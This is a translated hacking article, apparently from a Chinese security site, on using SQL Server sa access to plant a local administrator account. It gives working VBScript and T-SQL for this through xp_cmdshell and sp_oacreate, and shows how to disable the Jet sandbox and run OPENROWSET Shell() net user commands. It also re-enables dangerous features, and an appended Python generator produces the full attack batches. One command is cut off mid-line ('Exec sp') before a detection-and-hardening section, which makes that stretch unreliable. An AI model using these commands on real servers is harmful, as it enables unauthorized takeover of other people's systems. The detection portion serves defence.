Latest intrusion methods using Microsoft SQL Server sa privileges

Source: Internet
Author: User
Original article translated from Simplified Chinese.

With sa privileges on the server you often cannot add an administrator account the usual way, because net.exe and net1.exe have been restricted. VBScript, however, can reach the WinNT provider of Active Directory Service Interfaces (ADSI), which manages local users and groups, so an administrator can be added without going through cmd.exe or net.exe at all. The code is as follows:

Set wsnetwork = CreateObject("WScript.Network")
os = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(os)                              ' bind to the local machine through the ADSI WinNT provider
Set oe = GetObject(os & "/Administrators,group")    ' bind to the local Administrators group
Set od = ob.Create("user", "test")                  ' create a user named test
od.SetPassword "1234"                               ' set the password
od.SetInfo                                          ' commit the new account
Set of = GetObject(os & "/test,user")               ' re-bind to the new user (also confirms it was created)
oe.Add os & "/test"                                 ' add the user to Administrators

Save the above code as 1.vbs and run "cscript 1.vbs". A user named test with password 1234 is added to the system. Note that the built-in group name Administrators is localized on non-English versions of Windows and must be adjusted accordingly. The equivalent, executed from Query Analyzer with sa, writes the same script to disk through OLE Automation:

Declare @o int, @f int, @ret int
Exec sp_oacreate 'Scripting.FileSystemObject', @o out
Exec sp_oamethod @o, 'CreateTextFile', @f out, 'c:\1.vbs', 1
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'Set wsnetwork = CreateObject("WScript.Network")'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'os = "WinNT://" & wsnetwork.ComputerName'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'Set ob = GetObject(os)'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'Set oe = GetObject(os & "/Administrators,group")'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'Set od = ob.Create("user", "test")'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'od.SetPassword "1234"'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'od.SetInfo'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'Set of = GetObject(os & "/test,user")'
Exec @ret = sp_oamethod @f, 'WriteLine', null, 'oe.Add os & "/test"'
Exec sp_oamethod @f, 'Close'       -- release the file handle so cscript can open 1.vbs
Exec sp_oadestroy @f
Exec sp_oadestroy @o

After executing the statements above, run the following line as a separate batch. If it is submitted together with them, the TextStream object that wrote the file may still hold C:\1.vbs open; cscript then reports that C:\1.vbs is being used by another program, and the user is not added:

Exec master..xp_cmdshell 'cscript c:\1.vbs'

If the user is not added, the password 1234 may be too simple to satisfy the server's password complexity policy; try a password that meets the policy. The VBS file can also be written with echo through xp_cmdshell, one line per call, in this form (a relative name such as 1.vbs lands in the working directory of the SQL Server process, so use a full path such as c:\1.vbs to be sure where the file goes):

Exec master..xp_cmdshell 'echo Set wsnetwork = CreateObject("WScript.Network") > 1.vbs'

Lines that contain & fail with this method because cmd.exe treats an unquoted & as a command separator: echo stops at that point and the rest of the line is run as a second command. Escape it as ^& (the caret escapes &, |, <, > and ^ outside double quotes; inside double quotes these characters are already literal) and append the remaining lines with >> rather than >.
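As an added example (mine, not code from the article), the following generates both file-writing batches shown above, the sp_oamethod WriteLine sequence and the xp_cmdshell echo sequence, from the VBScript lines and applies the escaping each needs: doubled single quotes for the T-SQL literal, and a caret before &, |, <, > and ^ outside double quotes for cmd.exe, which is exactly what the echo lines containing & were missing. The path c:\1.vbs and the variable name @f are taken from the article; the VBScript lines are the article's script, embedded here as constructed input.

```python
"""Generate T-SQL that writes a VBScript file on the SQL Server host by either of
the two methods the article uses (sp_oamethod WriteLine, or xp_cmdshell echo).
Added example; not part of the original article."""

CMD_META = set('&|<>^')   # characters cmd.exe treats specially outside double quotes


def cmd_escape(line: str) -> str:
    """Escape a line so that `echo <line>` in cmd.exe prints it verbatim.

    cmd.exe only treats & | < > ^ as special outside double quotes; inside a quoted
    region they are literal and a caret would itself be printed, so the quote state
    is tracked instead of escaping blindly.
    """
    out = []
    in_quotes = False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_META and not in_quotes:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def tsql_quote(s: str) -> str:
    """Double single quotes so the text survives as a T-SQL string literal."""
    return s.replace("'", "''")


def via_oa_writeline(lines, path=r'c:\1.vbs', obj='@f'):
    """Method 1: Scripting.FileSystemObject TextStream, one WriteLine per line.

    Ends with Close and sp_oadestroy so the file is not left open, which is what
    produces the "being used by another program" error when cscript runs in the
    same batch.
    """
    stmts = [
        "Declare @o int, %s int, @ret int" % obj,
        "Exec sp_oacreate 'Scripting.FileSystemObject', @o out",
        "Exec sp_oamethod @o, 'CreateTextFile', %s out, '%s', 1" % (obj, tsql_quote(path)),
    ]
    for line in lines:
        stmts.append("Exec @ret = sp_oamethod %s, 'WriteLine', null, '%s'"
                     % (obj, tsql_quote(line)))
    stmts += ["Exec sp_oamethod %s, 'Close'" % obj,
              "Exec sp_oadestroy %s" % obj,
              "Exec sp_oadestroy @o"]
    return stmts


def via_echo(lines, path=r'c:\1.vbs'):
    """Method 2: one xp_cmdshell per line; > creates the file, >> appends.

    The space before the redirection is kept deliberately: `echo x 1>>file` would
    otherwise be parsed as a redirection of handle 1 when a line ends in a digit.
    Trailing whitespace is harmless in VBScript.
    """
    stmts = []
    for i, line in enumerate(lines):
        redirect = '>' if i == 0 else '>>'
        cmd = 'echo %s %s %s' % (cmd_escape(line), redirect, path)
        stmts.append("Exec master..xp_cmdshell '%s'" % tsql_quote(cmd))
    return stmts


# Constructed input: the ADSI script from the article.
VBS_LINES = [
    'Set wsnetwork = CreateObject("WScript.Network")',
    'os = "WinNT://" & wsnetwork.ComputerName',
    'Set ob = GetObject(os)',
    'Set oe = GetObject(os & "/Administrators,group")',
    'Set od = ob.Create("user", "test")',
    'od.SetPassword "1234"',
    'od.SetInfo',
    'oe.Add os & "/test"',
]

if __name__ == '__main__':
    for stmt in via_oa_writeline(VBS_LINES) + via_echo(VBS_LINES):
        print(stmt)
```

The escaping in cmd_escape is what the article's echo attempt lacked: the second VBScript line comes out as `echo os = "WinNT://" ^& wsnetwork.ComputerName >> c:\1.vbs`, and an & that sits inside a double-quoted VBScript string is left alone.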

The Jet sandbox route avoids xp_cmdshell and the other extended stored procedures and their DLLs altogether: the Jet engine can evaluate VBA functions such as Shell() inside a query. For security reasons Jet's sandbox mode, which blocks such unsafe expressions, is enabled by default, so xp_regwrite is used to set SandboxMode to 1, which turns the sandbox off for non-Access applications such as SQL Server (0 turns it off everywhere):

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandboxMode', 'REG_DWORD', 1

Then use OPENROWSET through the Jet provider to call Shell() and add a user test with password 1234 to the system. The query needs an existing .mdb file to open; ias.mdb under System32\ias is present on a default install:

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';database=C:\WINDOWS\System32\ias\ias.mdb', 'select shell("cmd.exe /c net user test 1234 /add")')
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';database=C:\WINDOWS\System32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup Administrators test /add")')

The system directory, and therefore the path to ias.mdb, differs between operating systems and must be adjusted as needed:

NT/2K: C:\winnt\system32\
XP/2003: C:\windows\system32\

In addition, Microsoft SQL Server 2005 disables these features by default, so they must be switched on with sp_configure first.

Enable xp_cmdshell:

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp_cmdshell', 1; reconfigure;

Enable OPENROWSET (ad hoc distributed queries):

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'Ad Hoc Distributed Queries', 1; reconfigure;

Enable sp_oacreate:

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp
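Every stage of the procedure above leaves a distinctive statement text on the server: sp_configure turning a disabled feature on, sp_oacreate/sp_oamethod writing a file, xp_cmdshell, xp_regwrite against the Jet SandboxMode value, and OPENROWSET with a Jet Shell() expression. As an added example (mine, not from the article), the following scans statement texts for those five signatures. The input is constructed to resemble the statement column of a SQL Trace or SQL Server Audit record; real records carry more fields and the exact format is an assumption.

```python
"""Flag statement texts matching the SQL Server sa intrusion stages described in
the article.  Added example; not part of the original article.  Input is a list of
constructed statement strings, not a real trace or audit export."""
import re

# One signature per stage of the intrusion.  Signatures are matched on the
# whitespace-collapsed text so line-wrapped batches do not escape them.
SIGNATURES = {
    "enable_dangerous_option": re.compile(
        r"sp_configure\s+'(?:xp_cmdshell|ad hoc distributed queries|ole automation procedures)'\s*,\s*1",
        re.I),
    "ole_automation": re.compile(
        r"\bsp_oa(?:create|method|getproperty|setproperty)\b", re.I),
    # the lookbehind keeps the option name in sp_configure 'xp_cmdshell' from
    # double-counting as an execution of xp_cmdshell
    "xp_cmdshell": re.compile(r"(?<!')\bxp_cmdshell\b", re.I),
    "jet_sandbox_disable": re.compile(
        r"\bxp_regwrite\b.*jet\\4\.0\\engines.*sandboxmode", re.I),
    "jet_shell_expression": re.compile(
        r"\bopenrowset\s*\(\s*'microsoft\.jet\.oledb.*?shell\s*\(", re.I),
}


def classify(statement: str):
    """Return the set of stage names whose signature appears in one statement."""
    flat = " ".join(statement.split())
    return {name for name, rx in SIGNATURES.items() if rx.search(flat)}


def scan(statements):
    """Return (index, sorted stage names) for every statement that matched a stage."""
    hits = []
    for i, stmt in enumerate(statements):
        stages = classify(stmt)
        if stages:
            hits.append((i, sorted(stages)))
    return hits


# Constructed sample: the article's sequence interleaved with two benign statements.
SAMPLE = [
    "SELECT name FROM sys.databases",
    "Exec sp_configure 'show advanced options', 1; reconfigure; "
    "Exec sp_configure 'xp_cmdshell', 1; reconfigure;",
    "Exec sp_oacreate 'Scripting.FileSystemObject', @o out",
    "Exec master..xp_cmdshell 'cscript c:\\1.vbs'",
    "Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', "
    "'SOFTWARE\\Microsoft\\Jet\\4.0\\Engines', 'SandboxMode', 'REG_DWORD', 1",
    "Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', "
    "';database=C:\\WINDOWS\\System32\\ias\\ias.mdb', "
    "'select shell(\"cmd.exe /c net user test 1234 /add\")')",
    "UPDATE orders SET status = 'shipped' WHERE id = 42",
]

if __name__ == "__main__":
    for index, stages in scan(SAMPLE):
        print(index, ", ".join(stages), "<-", SAMPLE[index][:60])
```

Matching on statement text is a starting point, not a control: a string built at run time, for example EXEC('xp_' + 'cmdshell'), would not match, and the lookbehind on xp_cmdshell is there only to separate the configuration change from the execution. The durable defences are the ones the article's enabling commands undo: leave xp_cmdshell, Ad Hoc Distributed Queries and Ole Automation Procedures off, and do not run the service under an account that can create local administrators.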